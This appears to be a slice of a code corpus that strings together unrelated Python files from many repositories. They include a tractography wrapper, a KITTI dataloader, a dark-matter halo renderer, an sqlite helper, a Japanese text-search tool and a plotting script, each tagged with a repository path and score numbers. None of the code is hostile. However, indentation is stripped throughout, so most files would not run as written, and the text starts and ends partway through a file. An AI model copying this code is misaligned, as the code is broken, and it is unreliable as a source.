tckgen.add_arg('-seed_dynamic', input_image)
tckgen.add_arg('-nthreads', 12)
tckgen.add_arg('-select', num_streamlines)
tckgen.add_arg('-minlength', minlength)
tckgen.add_arg('-maxlength', maxlength)
tckgen.add_arg('-cutoff', cutoff)
if step is not None:
tckgen.add_arg('-step', step)
if angle is not None:
tckgen.add_arg('-angle', angle)
tckgen.add_arg('-force')
tckgen.run(version_arg='--version')
postproc = CmdInterface('MitkFiberProcessing')
postproc.add_arg('-i', tracts + '.tck', check_input=True)
postproc.add_arg('--compress', 0.1)
postproc.add_arg('-o', tracts + '.trk', check_output=True)
postproc.run()
return tracts + '.trk'
| 1.664063 | 2 |
pulsar/async/_subprocess.py | PyCN/pulsar | 1,410 | 39940 |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 0.679688 | 1 |
dataloader/stereo_kittilist15.py | ne3x7/VCN | 148 | 40068 | <reponame>ne3x7/VCN
import torch.utils.data as data
import pdb
from PIL import Image
import os
import os.path
import numpy as np
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def dataloader(filepath, typ = 'train'):
left_fold = 'image_2/'
right_fold = 'image_3/'
disp_L = 'disp_occ_0/'
disp_R = 'disp_occ_1/'
image = [img for img in os.listdir(filepath+left_fold) if img.find('_10') > -1]
image = sorted(image)
imglist = [1,3,6,20,26,35,38,41,43,44,49,60,67,70,81,84,89,97,109,119,122,123,129,130,132,134,141,144,152,158,159,165,171,174,179,182, 184,186,187,196]
if typ == 'train':
train = [image[i] for i in range(200) if i not in imglist]
elif typ == 'trainval':
train = [image[i] for i in range(200)]
val = [image[i] for i in imglist]
left_train = [filepath+left_fold+img for img in train]
right_train = [filepath+right_fold+img for img in train]
disp_train_L = [filepath+disp_L+img for img in train]
#disp_train_R = [filepath+disp_R+img for img in train]
left_val = [filepath+left_fold+img for img in val]
right_val = [filepath+right_fold+img for img in val]
disp_val_L = [filepath+disp_L+img for img in val]
#disp_val_R = [filepath+disp_R+img for img in val]
return left_train, right_train, disp_train_L, left_val, right_val, disp_val_L
| 2.1875 | 2 |
pyHalo/Rendering/two_halo.py | DarthLazar/pyHalo | 7 | 40196 | from pyHalo.Rendering.SpatialDistributions.uniform import LensConeUniform
import numpy as np
from copy import deepcopy
from pyHalo.Rendering.MassFunctions.power_law import GeneralPowerLaw
from pyHalo.Rendering.rendering_class_base import RenderingClassBase
class TwoHaloContribution(RenderingClassBase):
"""
This class adds correlated structure associated with the host dark matter halo. The amount of structure added is
proportional to b * corr, where b is the halo bias as computed by Sheth and Tormen (1999) and corr is the
matter-matter correlation function. Currently, this term is implemented as a rescaling of the background density by
b * corr, where the product is the average value computed over 2*dz, where dz is the spacing of the redshift planes
adjacent the redshift plane of the main deflector.
"""
def __init__(self, keywords_master, halo_mass_function, geometry, lens_cosmo, lens_plane_redshifts, delta_z_list):
self._rendering_kwargs = self.keyword_parse_render(keywords_master)
self.halo_mass_function = halo_mass_function
self.geometry = geometry
self.lens_cosmo = lens_cosmo
self.spatial_distribution_model = LensConeUniform(keywords_master['cone_opening_angle'], geometry)
self._lens_plane_redshifts = lens_plane_redshifts
self._delta_z_list = delta_z_list
super(TwoHaloContribution, self).__init__()
def render(self):
"""
Generates halo masses and positions for correlated structure around the main deflector
:return: mass (in Msun), x (arcsec), y (arcsec), r3d (kpc), redshift
"""
idx = np.argmin(abs(np.array(self._lens_plane_redshifts) - self.lens_cosmo.z_lens))
delta_z = self._delta_z_list[idx]
m = self.render_masses_at_z(self.lens_cosmo.z_lens, delta_z)
x, y = self.render_positions_at_z(self.lens_cosmo.z_lens, len(m))
subhalo_flag = [False] * len(m)
redshifts = [self.lens_cosmo.z_lens] * len(m)
r3d = np.array([None] * len(m))
return m, x, y, r3d, redshifts, subhalo_flag
def render_masses_at_z(self, z, delta_z):
"""
:param z: redshift at which to render masses
:param delta_z: thickness of the redshift slice
:return: halo masses at the desired redshift in units Msun
"""
norm, slope = self._norm_slope(z, delta_z)
args = deepcopy(self._rendering_kwargs)
log_mlow, log_mhigh = self._redshift_dependent_mass_range(z, args['log_mlow'], args['log_mhigh'])
mfunc = GeneralPowerLaw(log_mlow, log_mhigh, slope, args['draw_poisson'],
norm, args['log_mc'], args['a_wdm'], args['b_wdm'],
args['c_wdm'])
m = mfunc.draw()
return m
def render_positions_at_z(self, z, nhalos):
"""
:param z: redshift
:param nhalos: number of halos or objects to generate
:return: the x, y coordinate of objects in arcsec, and a 3 dimensional coordinate in kpc
The 3d coordinate only has a clear physical interpretation for subhalos, and is used to compute truncation raddi.
For line of sight halos it is set to None.
"""
x_kpc, y_kpc = self.spatial_distribution_model.draw(nhalos, z)
if len(x_kpc) > 0:
kpc_per_asec = self.geometry.kpc_per_arcsec(z)
x_arcsec = x_kpc * kpc_per_asec ** -1
y_arcsec = y_kpc * kpc_per_asec ** -1
return x_arcsec, y_arcsec
else:
return np.array([]), np.array([])
def _norm_slope(self, z, delta_z):
"""
This method computes the normalization of the mass function for correlated structure around the main deflector.
The normalization is defined as (boost - 1) * background, where background is the mean normalization of the
halo mass function computed with (for example) Sheth-Tormen, and boost is the average contribution of the
two-halo term integrated over a comoving distance corresponding to 2 * dz, where dz is the redshift plane
spacing.
boost(z, r_min, r_max) = 2 / r_max int_{r_min}^{r_max} x(r, z, M_{host}) * dr
where xi(r, M_{host) is the linear halo bias times the matter-matter correlation function,
r_min is set of 0.5 Mpc, and r_max is the comoving distance corresponding to 2*dz, where dz is the redshift
spacing. M_host is the mass in M_sun of the host dark matter halo
:param z: the redshift which to evaluate the matter-matter correlation function and halo bias
:param delta_z: the redshift spacing of the lens planes adjacent the main deflector
:return: the normalization of the two-halo term mass function. The form of the two-halo term mass function is
assumed to have the same shape as the background halo mass function
"""
if z != self.lens_cosmo.z_lens:
raise Exception('this class must be evaluated at the main deflector redshift')
volume_element_comoving = self.geometry.volume_element_comoving(z, delta_z)
plaw_index = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index']
norm_per_unit_volume = self.halo_mass_function.norm_at_z_density(z, plaw_index,
self._rendering_kwargs['m_pivot'])
norm_per_unit_volume *= self._rendering_kwargs['LOS_normalization']
reference_norm = norm_per_unit_volume * volume_element_comoving
rmax = self.lens_cosmo.cosmo.D_C_transverse(z + delta_z) - self.lens_cosmo.cosmo.D_C_transverse(z)
rmin = min(rmax, 0.5)
two_halo_boost = self.halo_mass_function.two_halo_boost(self._rendering_kwargs['host_m200'], z, rmax=rmax,
rmin=rmin)
slope = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index']
norm = (two_halo_boost - 1) * reference_norm
return norm, slope
def convergence_sheet_correction(self, *args, **kwargs):
return {}, [], []
@staticmethod
def keyword_parse_render(keywords_master):
kwargs = {}
required_keys = ['log_mlow', 'log_mhigh', 'host_m200', 'LOS_normalization',
'draw_poisson', 'delta_power_law_index', 'm_pivot', 'log_mc', 'a_wdm', 'b_wdm', 'c_wdm']
for key in required_keys:
if key not in keywords_master:
raise Exception('Required keyword argument ' + str(key) + ' not specified.')
else:
kwargs[key] = keywords_master[key]
return kwargs
def keys_convergence_sheets(self):
return {}
| 1.898438 | 2 |
vidaug/augmentors/__init__.py | redzhepdx/vidaug | 1 | 40324 | from __future__ import absolute_import
from .affine import *
from .crop import *
from .flip import *
from .geometric import *
from .group import *
from .intensity import *
from .temporal import *
| 0.482422 | 0 |
data_pipeline/sql/statement/ddl_statement.py | albertteoh/data_pipeline | 0 | 40452 | ###############################################################################
# Module: ddl_statement
# Purpose: Parent class for DDL (Data Definition Language) statements
#
# Notes:
#
###############################################################################
import data_pipeline.constants.const as const
from abc import ABCMeta, abstractmethod
from .base_statement import BaseStatement
class DdlStatement(BaseStatement):
"""Contains data necessary for producing a valid DDL statement"""
__metaclass__ = ABCMeta
def __init__(self, table_name):
super(DdlStatement, self).__init__(table_name)
self._entries = []
@property
def entries(self):
return self._entries
@abstractmethod
def add_entry(self, **kwargs):
pass
def _build_field_params(self, params):
if params:
return "({})".format(const.COMMASPACE.join(params))
return const.EMPTY_STRING
def _build_field_string(self, value):
return " {}".format(value if value else const.EMPTY_STRING)
| 2.21875 | 2 |
33. Python Programs/FactorialOfNumbers.py | Ujjawalgupta42/Hacktoberfest2021-DSA | 225 | 40580 | <reponame>Ujjawalgupta42/Hacktoberfest2021-DSA
for i in range(int(input())):
fact=1
a=int(input())
for j in range(1,a+1,1):
fact=fact*j
print(fact)
def factorial(n):
return 1 if (n==1 or n==0) else n * factorial(n - 1);
num = int(input('Enter number'))
print("Factorial of",num,"is",
factorial(num))
| 2.625 | 3 |
accountsplus/tests/test_admin.py | GhalebKhaled/django-users-plus | 3 | 40708 | <reponame>GhalebKhaled/django-users-plus
from __future__ import unicode_literals
import django.test
import django.contrib.admin
import logging
from .. import admin
from test_models import (UnitTestCompany, UnitTestUser, UnitTestAuditLogEvent, )
logging.disable(logging.CRITICAL)
@django.contrib.admin.register(UnitTestCompany)
class UnitTestCompanyAdmin(admin.BaseCompanyAdmin):
pass
@django.contrib.admin.register(UnitTestUser)
class UnitTestUserAdmin(admin.BaseUserAdmin):
pass
@django.contrib.admin.register(UnitTestAuditLogEvent)
class UnitTestAuditLogEventAdmin(admin.BaseAuditLogEventAdmin):
pass
| 1.164063 | 1 |
main.py | Grimmaldi/supergoaltracker | 0 | 40836 | from app import app
if __name__ == '__main__':
app = app.Session() | 0.421875 | 0 |
abc_097_b.py | YukiShinonome/AtCoder | 0 | 40964 | <filename>abc_097_b.py
X = int(input())
a_list = []
for s in range(1, 32):
for i in range(2, 10):
a = s ** i
if a > 1000:
break
a_list.append(a)
a2 = sorted(list(set(a_list)), reverse=True)
for n in a2:
if n <= X:
print(n)
break | 2.09375 | 2 |
setup.py | KevinMusgrave/pytorch-adapt | 131 | 41092 | import sys
import setuptools
sys.path.insert(0, "src")
import pytorch_adapt
with open("README.md", "r") as fh:
long_description = fh.read()
extras_require_ignite = ["pytorch-ignite == 0.5.0.dev20220221"]
extras_require_lightning = ["pytorch-lightning"]
extras_require_record_keeper = ["record-keeper >= 0.9.31"]
extras_require_timm = ["timm"]
extras_require_docs = [
"mkdocs-material",
"mkdocstrings[python]",
"griffe",
"mkdocs-gen-files",
"mkdocs-section-index",
"mkdocs-literate-nav",
]
extras_require_dev = ["black", "isort", "nbqa", "flake8"]
setuptools.setup(
name="pytorch-adapt",
version=pytorch_adapt.__version__,
author="<NAME>",
description="Domain adaptation made easy. Fully featured, modular, and customizable.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/KevinMusgrave/pytorch-adapt",
package_dir={"": "src"},
packages=setuptools.find_packages(where="src"),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.0",
install_requires=[
"numpy",
"torch",
"torchvision",
"torchmetrics",
"pytorch-metric-learning >= 1.3.1.dev0",
],
extras_require={
"ignite": extras_require_ignite,
"lightning": extras_require_lightning,
"record-keeper": extras_require_record_keeper,
"timm": extras_require_timm,
"docs": extras_require_docs,
"dev": extras_require_dev,
},
)
| 1.15625 | 1 |
data processing/create_word2vec_input.py | RayL0707/Finance_KG | 0 | 41220 | <gh_stars>0
import json
import thulac
import time
# n
# all+n (all 不包含 vm)
# a+n
# np 人名
# ns 地名
# ni 机构名
# nz 其它专名
# t和r 时间和代词该步不用加,但是在命名实体识别时需要考虑(这里做个备注)
# i 习语
# j 简称
# x 其它
# 不能含有标点w
def nowok(s): #当前词的词性筛选
if s=='n' or s=='np' or s=='ns' or s=='ni' or s=='nz':
return True
if s=='i' or s=='j' or s=='x' or s=='id' or s=='g' or s=='t':
return True
if s=='t' or s=='m':
return True
return False
def judge(s): #含有非中文和英文,数字的词丢弃
num_count = 0
for ch in s:
if u'\u4e00' <= ch <= u'\u9fff':
pass
elif '0' <= ch <= '9':
num_count += 1
pass
elif 'a' <= ch <= 'z':
pass
elif 'A' <= ch <= 'Z':
pass
else:
return False
if num_count == len(s): ##如果是纯数字,丢弃
return False
return True
# 给定分词结果,提取NER
def createWordList(x):
i = 0
n = len(x)
L = []
while i < n:
if judge(x[i][0]) == False :
i += 1
continue;
if nowok(x[i][1]):
L.append(x[i][0])
i += 1
return L
def createTable(num):
start = time.time()
thu = thulac.thulac()
file = open('agri_economic.json', encoding='utf-8')
print("begin!")
f = json.load(file)
count = 0
file_text = ""
for p in f:
count += 1
if int(count/100) != num:
continue
if count % 10 == 0:
cur = time.time()
print("now id : " + str(count) + " table size :" )
print("Running Time : " + str(int(cur-start)) + " s......")
detail = p['detail']
# if len(detail) > 600:
# detail = detail[0:600]
title = p['title']
# 分词
text = thu.cut(detail)
wordList = createWordList(text)
file_text += title
for word in wordList:
file_text += ' ' + word
file_text += '\n'
file_object = open('article'+str(num)+".txt",'w')
file_object.write(file_text)
file_object.close()
createTable(0)
#createTable(1)
#createTable(2)
#createTable(3)
#createTable(4)
#createTable(5)
#createTable(6)
#createTable(7)
#createTable(8)
#createTable(9)
#test()
#def test():
# thu = thulac.thulac()
# detail = "指在干旱、半干旱地区依靠自然降水栽培小麦。"
# text = thu.cut(detail)
# for x in text:
# print(x[1])
#
| 2.21875 | 2 |
sql.py | saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands | 0 | 41348 | ##−∗−coding : utf−8−∗−
import sqlite3 as lite
import logging
import sys
from collections import OrderedDict
import conf
LOG_FORMAT = "%(levelname)s > Line:%(lineno)s - %(message)s"
logging.basicConfig(filename="debug.log",
level=logging.DEBUG,
format=LOG_FORMAT,
filemode="w",
)
logger = logging.getLogger(__name__)
# encode: string -> byte
# unicode.encode() -> bytes
# decode: bytes -> string
# bytes.decode() -> unicode
# no need to encoding or decode
def decode_to_text(text):
if isinstance(text, str):
print(text)
if "সময়" == text:
logger.debug(str(text.encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
# decode_text = text.encode('utf-8').decode('utf-8')
decode_text = text
else:
decode_text = text
return decode_text
def convert_into_dic(columns, rows):
"""
Return query value into dictionary
:type columns: list
:type rows: tuple
"""
column_name = None
row_val = None
query_val = OrderedDict()
length_c = len(columns)
for c in range(0,length_c):
column_name = columns[c]
query_val[column_name] = [] # create key name with empty list value
for r in range(0,len(rows)):
row_val = decode_to_text(rows[r][c])
query_val[column_name].append(row_val)
return query_val
def run_query(query):
"""
Return query result
sql: rawstring of sql
"""
con = None
data = None
try:
con = lite.connect('VoiceCommand.db')
cur = con.cursor()
cur.execute(query)
# TODO: Simplified it
if True in map(lambda x: x.lower() in query.lower(),['update','insert','delete']):
conf.NEW_COMMAND = True
data = cur.fetchall()
print(data)
if cur.description:
column_name = [c[0] for c in cur.description]
if data:
data = convert_into_dic(column_name, data)
con.commit()
except lite.Error as e:
print("Error {}:".format(e.args[0]))
sys.exit(1)
finally:
if con:
con.close()
return data
| 1.757813 | 2 |
venv/Lib/site-packages/pyo/examples/17-osc/02-receive-streams.py | mintzer/pupillometry-rf-back | 0 | 41476 | """
Receiving Open Sound Control messages as audio streams
**02-receive-streams.py**
This script shows a granulation process controlled by OSC messages
coming from another program (run the next example, *03-send-streams.py*,
to get values coming in).
"""
from pyo import *
s = Server().boot()
# The sound table to granulate.
table = SndTable("../snds/flute.aif")
# Listen addresses '/density', '/position', '/pitch_rand' and '/duration' on port 9000.
rec = OscReceive(port=9000, address=["/density", "/position", "/pitch_rand", "/duration"])
# Sets initial values for the OSC streams. This allow the program to run with
# minimal behaviour even if no message have been sent on these addresses.
rec.setValue("/density", 0.5)
rec.setValue("/position", 0.5)
rec.setValue("/pitch_rand", 0.0)
rec.setValue("/duration", 0.5)
# Density of grains, between 1 and 250 grains per second.
dens = SigTo(rec["/density"], time=0.05, mul=249, add=1)
# Reading position, in samples, in the table + little jitter noise.
pos = SigTo(rec["/position"], time=0.05, mul=table.getSize(), add=Noise(100))
# Amplitude of a jitter noise around 1.0 to control the pitch of individual grains.
rpit = SigTo(rec["/pitch_rand"], time=0.05, mul=0.2, add=0.001)
pit = Noise(mul=rpit, add=1)
# Grain duration, between 0.025 and 0.5 second.
dur = SigTo(rec["/duration"], time=0.05, mul=0.475, add=0.025)
grain = Particle(
table=table, # table to read samples from.
env=HannTable(), # grain envelope.
dens=dens, # density of grains per second.
pitch=pit, # pitch of grains.
pos=pos, # position in the table where to start the grain.
dur=dur, # grain duration.
dev=0.01, # Maximum deviation of the starting time of the grain.
pan=Noise(0.5, 0.5), # Panning factor of the grain.
chnls=2, # Number of channels to output.
mul=0.15,
).out()
s.gui(locals())
| 1.804688 | 2 |
solutions/solved008.py | pedraodeveloper66/Najma | 0 | 41604 | <gh_stars>0
"""
Write a program that reads a value in meters and displays it converted to centimeters and millimeters
"""
m = float(input('Uma distância em metros: '))
"""Kilometre --> Divide the length value by 1000"""
km = m / 1000
"""Hectometre --> Divide the length value by 100"""
hm = m / 100
"""Decametre --> Divide the length value by 10"""
dam = m / 10
"""Decimetre --> Multiply the length value by 10"""
dm = m * 10
"""Centimetre --> Multiply the length value by 100"""
cm = m * 100
"""Millimetre --> Multiply the length value by 1000"""
mm = m * 1000
print('A medida de {}m corresponde a\n{}km\n{}hm\n{}dam\n{}dm\n{}cm\n{}mm'.format(m, km, hm, dam, dm, cm, mm))
| 3.25 | 3 |
polls/application/bungou.py | jphacks/B_2015 | 0 | 41732 | <gh_stars>0
# 以下ほぼ彩花ちゃんのコピペ
"""import requests
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36'}
url_1 = 'https://www.aozora.gr.jp/cards/000035/files/301_ruby_5915.zip'
url_2 = 'https://www.aozora.gr.jp/cards/000035/files/1565_ruby_8220.zip'
url_3 = 'https://www.aozora.gr.jp/cards/000035/files/1567_ruby_4948.zip'
url_4 = 'https://www.aozora.gr.jp/cards/000035/files/1569_ruby_18584.zip'
url_5 = 'https://www.aozora.gr.jp/cards/000035/files/270_ruby_1164.zip'
r_1 = requests.get(url_1, headers= headers)
r_2 = requests.get(url_2, headers= headers)
r_3 = requests.get(url_3, headers= headers)
r_4 = requests.get(url_4, headers= headers)
r_5 = requests.get(url_5, headers= headers)
content_1 = r_1.content
content_2 = r_2.content
content_3 = r_3.content
content_4 = r_4.content
content_5 = r_5.content
import io
import zipfile
f_1 = io.BytesIO(content_1)
f_2 = io.BytesIO(content_2)
f_3 = io.BytesIO(content_3)
f_4 = io.BytesIO(content_4)
f_5 = io.BytesIO(content_5)
zipf_1 = zipfile.ZipFile(f_1)
zipf_2 = zipfile.ZipFile(f_2)
zipf_3 = zipfile.ZipFile(f_3)
zipf_4 = zipfile.ZipFile(f_4)
zipf_5 = zipfile.ZipFile(f_5)
namelist_1 = zipf_1.namelist()
namelist_2 = zipf_2.namelist()
namelist_3 = zipf_3.namelist()
namelist_4 = zipf_4.namelist()
namelist_5 = zipf_5.namelist()
namelist_1
namelist_2
namelist_3
namelist_4
namelist_5
import re
title = ''
author = ''
def syori(text,first_sentence,last_sentence):
#title, text = text.split('【テキスト中に現れる記号について】')
#print(title)
_, text = text.split(first_sentence)
text, _ = text.split(last_sentence)
text = first_sentence + text + last_sentence
text = text.replace('|', '').replace(' ', '')
text = re.sub('《\w+》', '', text)
text = re.sub('[#.*]','', text)
text = text.replace('\r','').replace('\n','')
text = re.sub('[、「」?]', '', text)
text = re.sub('\(\w+\)', '', text)
text = re.sub('\[\w+\]', '', text)
text = re.sub('[ \t]+$','',text)
text = re.sub('^[ \t]+$','',text)
text = re.sub('^ +$','',text)
text = re.sub('[ ]+','',text)
text = text.split('。')
return text
#info = {}
def make_info(btext,atext):
list = btext.splitlines()
#print(list[0])
#print(list[1])
#print(btext[:10])
#print('\n')
#print(atext[:10])
info={}
for sentence in atext:
#print(sentence)
info[sentence]=list[:2]
return info
print("loading......")
###########################################
data_1 = zipf_1.read(namelist_1[0])
original_text_1 = data_1.decode('Shift_JIS')
#print(original_text_1[:500])
#title, _ = original_text_1.split('【テキスト中に現れる記号について】')
#title, _ = title.split('-------------------------------------------------------')
#list = title.splitlines()
#print(list[1])
#print(text)
#sentences_1 = text.split('。')
first_sentence = '私は、その男の写真を三葉、見たことがある。'
last_sentence = '神様みたいないい子でした'
sentences_1 = syori(original_text_1,first_sentence,last_sentence)
info = make_info(original_text_1,sentences_1)
# print('文の数:', len(sentences_1))
# print(sentences_1[:10])
#print(info['私は、その男の写真を三葉、見たことがある。'])
#print(info)
###########################################
data_2 = zipf_2.read(namelist_2[0])
original_text_2 = data_2.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '朝、食堂でスウプを一さじ、すっと吸ってお母さまが、'
last_sentence = 'ぜひお聞きいれのほど願います。'
#print(text)
sentences_2 = syori(original_text_2,first_sentence,last_sentence)
# print('文の数:', len(sentences_2))
#print(type(sentences_1[0]))
# print(sentences_2[:10])
info.update(make_info(original_text_2,sentences_2))
#print(type(text))
#print(info)
##########################################
data_3 = zipf_3.read(namelist_3[0])
original_text_3 = data_3.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = 'メロスは激怒した。必ず、'
last_sentence = '勇者は、ひどく赤面した。'
#print(text)
sentences_3 = syori(original_text_3,first_sentence,last_sentence)
# print('文の数:', len(sentences_3))
#print(type(sentences_1[0]))
# print(sentences_3[:10])
# print(type(sentences_3[0]))
info.update(make_info(original_text_3,sentences_3))
##########################################
data_4 = zipf_4.read(namelist_4[0])
original_text_4 = data_4.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '伊豆の南、温泉が湧き出ているというだけで、他には何一つとるところの無い、つまらぬ山村である。'
last_sentence = '何をしている事やら。'
sentences_4 = syori(original_text_4,first_sentence,last_sentence)
# print('文の数:', len(sentences_4))
#print(type(sentences_1[0]))
# print(sentences_4[:10])
#print(type(text))
info.update(make_info(original_text_4,sentences_4))
##########################################
data_5 = zipf_5.read(namelist_5[0])
original_text_5 = data_5.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '富士の頂角、広重《ひろしげ》の富士は八十五度、文晁《ぶんてう》の富士も八十四度くらゐ、'
last_sentence = '酸漿《ほほづき》に似てゐた。'
#print(text)
sentences_5 = syori(original_text_5,first_sentence,last_sentence)
# print('文の数:', len(sentences_5))
#print(type(sentences_1[0]))
# print(sentences_5[:10])
#print(type(text))
sentences_list = [sentences_1,sentences_2,sentences_3,sentences_4,sentences_5]
# print(type(sentences_list))
info.update(make_info(original_text_5,sentences_5))
####################################################################
#ここは関数化しない方がいいのかな... viewsよくわからん
from janome.tokenizer import Tokenizer
BEGIN = '__BEGIN__'
END = '__END__'
#after_list = []
t = Tokenizer()
gokan_dict={}
for sentences in sentences_list:
for sentence in sentences:
for gokan in [token.base_form for token in t.tokenize(sentence)]:
if gokan_dict.get(gokan)==None:
gokan_dict[gokan]=[sentence]
else:
gokan_dict[gokan].append(sentence)
class pycolor:
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PURPLE = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
RETURN = '\033[07m' #反転
ACCENT = '\033[01m' #強調
FLASH = '\033[05m' #点滅
RED_FLASH = '\033[05;41m' #赤背景+点滅
END = '\033[0m'
import os
import csv
def search(param):
# param = input()
from dictionary import make_synonym_dict
synonym_dict = {}
synonym_dict=make_synonym_dict(param)
datas = []
for synonym in synonym_dict[param]:
if gokan_dict.get(synonym):
for sentence in gokan_dict[synonym]:
words=t.tokenize(sentence)
words=list(words)
#b=False
#text1 = ""
#text2 = ""
for word in words:
if word.base_form==synonym:
#b=True
param2=word.surface
text_list = sentence.split(word.surface)
break
datas.append(text_list[0]+param2+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
# 色付き datas.append(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
# print(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
writer = csv.writer(f, lineterminator='\n,')
writer.writerow(datas)
# writer.writerow("DONE")"""
import os
import csv
import random
#from dictionary import make_synonym_dict
def search(param):
#from janome.tokenizer import Tokenizer
#t = Tokenizer()
#print(param2)
print("search:")
print(param)
def flatten(nested_list):
"""2重のリストをフラットにする関数"""
return [e for inner_list in nested_list for e in inner_list]
def search2(param):
param2 = '"' + param + '":'
gokan_sentence_list = []
print(os.getcwd())
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'akutagawa_gokan_dict.tsv', encoding = 'utf-8')as f:
print("開けた!")
for line in f:
#print(line)
#t = 0
if param2 in line:
_,line = line.split(param2)
gokan_sentence_list = line.split('\t')
#t = random.randint(0,len(gokan_sentence_list)-1)
break
print(gokan_sentence_list)
print("aaa")
if gokan_sentence_list!=[]:
return random.choice(gokan_sentence_list)
else:
return ""
gokan_sentence_list = []
gokan_sentence_list.append(search2(param))
#print(gokan_dict)
synonym_dict = {}
#synonym_dict=make_synonym_dict(param)
#print(synonym_dict)
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'akutagawa_synonym_dict.tsv', encoding = 'utf-8')as f:
param2 = '"'+param+'":'
for line in f:
if param2 in line:
_,line = line.split(param2)
synonym_dict[param] = line.split('\t')
for synonym in synonym_dict[param]:
#print(synonym)
gokan_sentence_list.append(search2(synonym))
#if gokan_dict.get(synonym):
#for sentence in gokan_sentence_list:
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv','a') as f:
for sentence in gokan_sentence_list:
f.write(sentence + '::::::::::')
#writer.writerow(gokan_sentence_list)
# writer.writerow("DONE")"""
# 以下を追記(return_text()を呼び出すと"Hello!!"が返される)
def return_text():
#return "Hello!"
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv') as f:
reader = csv.reader(f, lineterminator='\n,')
datas = []
for row in reader:
# print(row)
datas.append(row)
os.remove(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv')
return datas
"""
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
reader = csv.reader(f, lineterminator='\n')
datas = []
for row in reader:
datas.append(row)
return datas
"""
"""
テスト用
# coding:utf-8
import os
import csv
# htmlからのデータをcsvファイルに記録
def search(data):
print("dataだよ")
datas = [data]
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerow(datas)
""" | 1.226563 | 1 |
cea/plots/optimization/pareto_capacity_installed.py | pajotca/CityEnergyAnalyst | 1 | 41860 | <reponame>pajotca/CityEnergyAnalyst<filename>cea/plots/optimization/pareto_capacity_installed.py
from __future__ import division
from __future__ import print_function
import plotly.graph_objs as go
from plotly.offline import plot
from cea.plots.variable_naming import LOGO, COLOR, NAMING
def pareto_capacity_installed(data_frame, analysis_fields, title, output_path):
# CALCULATE GRAPH
traces_graph = calc_graph(analysis_fields, data_frame)
# CALCULATE TABLE
traces_table = calc_table(analysis_fields, data_frame)
# PLOT GRAPH
traces_graph.append(traces_table)
layout = go.Layout(images=LOGO, title=title, barmode='stack',
yaxis=dict(title='Power Capacity [kW]', domain=[.35, 1]),
xaxis=dict(title='Point in the Pareto Curve'))
fig = go.Figure(data=traces_graph, layout=layout)
plot(fig, auto_open=False, filename=output_path)
return {'data': traces_graph, 'layout': layout}
def calc_table(analysis_fields, data_frame):
# analysis of renewable energy share
data_frame['load base unit'] = calc_top_three_technologies(analysis_fields, data_frame, analysis_fields)
table = go.Table(domain=dict(x=[0, 1], y=[0, 0.2]),
header=dict(values=['Individual ID', 'Building connectivity [%]', 'Load Base Unit']),
cells=dict(values=[data_frame.index, data_frame['Buildings Connected Share'].values,
data_frame['load base unit'].values]))
return table
def calc_graph(analysis_fields, data):
# CALCULATE GRAPH FOR CONNECTED BUILDINGS
graph = []
data['total'] = data[analysis_fields].sum(axis=1)
data['Name'] = data.index.values
data = data.sort_values(by='total', ascending=False) # this will get the maximum value to the left
for field in analysis_fields:
y = data[field]
flag_for_unused_technologies = all(v == 0 for v in y)
if not flag_for_unused_technologies:
name = NAMING[field]
total_perc = (y / data['total'] * 100).round(2).values
total_perc_txt = ["(" + str(x) + " %)" for x in total_perc]
trace = go.Bar(x=data['Name'], y=y, text=total_perc_txt, name = name,
marker=dict(color=COLOR[field]))
graph.append(trace)
# CALCULATE GRAPH FOR DISCONNECTED BUILDINGS
return graph
def calc_building_connected_share(network_string):
share = round(sum([int(x) for x in network_string]) / len(network_string) * 100, 0)
return share
def calc_renewable_share(all_fields, renewable_sources_fields, dataframe):
nominator = dataframe[renewable_sources_fields].sum(axis=1)
denominator = dataframe[all_fields].sum(axis=1)
share = (nominator / denominator * 100).round(2)
return share
def calc_top_three_technologies(analysis_fields, data_frame, fields):
top_values = []
data = data_frame[analysis_fields]
for individual in data.index:
top_values.extend(data.ix[individual].sort_values(ascending=False)[:1].index.values)
# change name
top_values = [x.split('_capacity', 1)[0] for x in top_values]
return top_values
| 1.890625 | 2 |
spectrochempy_gui/widgets/progresswidget.py | fernandezc/spectrochempy_gui | 0 | 41988 | #!/usr/bin/env python
"""
